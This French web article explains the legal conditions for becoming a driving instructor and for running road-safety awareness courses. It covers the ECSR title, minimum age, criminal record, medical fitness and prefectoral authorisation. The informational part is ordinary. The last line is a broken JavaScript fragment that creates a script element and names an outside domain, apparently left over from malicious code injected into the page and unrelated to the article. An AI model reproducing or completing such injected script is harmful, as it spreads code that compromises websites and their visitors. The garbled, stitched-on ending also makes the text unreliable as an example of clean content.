On ne s’improvise pas moniteur d’auto-écoles, ou enseignant à la conduite. En effet, le métier d’enseignant à la conduite est encadré par le code de la route (Article R212-2) qui stipule que l’autorisation d’enseigner la conduite et la sécurité routière est possible pour les personnes qui remplissent les conditions suivantes :

  • Remplir les conditions physiques qui permettent d’obtenir le permis. Une visite médicale avec un médecin agréé sera nécessaire.
  • Être âgé(e) d’au moins vingt ans ;
  • Être titulaire du permis de conduire de la catégorie B ;
  • Ne plus être en période probatoire ;
  • Être titulaire du titre professionnel d’Enseignant de la conduite et de la Sécurité routière (ECSR), qui a remplacé le BEPECASER le 1er juillet 2016 ;
  • Avoir un casier judiciaire en adéquation (pas de délit d’atteinte aux personnes humaines, aux biens, pas de fraudes aux examens et concours publics, pas de délits au Code du travail, Code de la route et Code de la santé) ;
  • Avoir été reconnu apte physiquement à l’exercice de la profession ;
  • Obtenir une autorisation administrative d’enseigner délivrée par le préfet. Cette autorisation est valable 5 ans puis renouvelable par reconduction expresse.

Le moniteur d’auto-écoles est très généralement en capacité d’animer des stages de sensibilisation à la sécurité routière. Pour cela, il faut également remplir les conditions suivantes :

  • Disposer du titre professionnel énoncé ci-dessus ;
  • être âgé d’au moins 25 ans et être titulaire d’une attestation de suivi de formation initiale à l’animation de stages de sensibilisation à la sécurité routière délivrée dans les conditions fixées par arrêté du ministre chargé de la sécurité routière.

var d=document;var s=d.createElement(‘script’); } else {topspyapps.net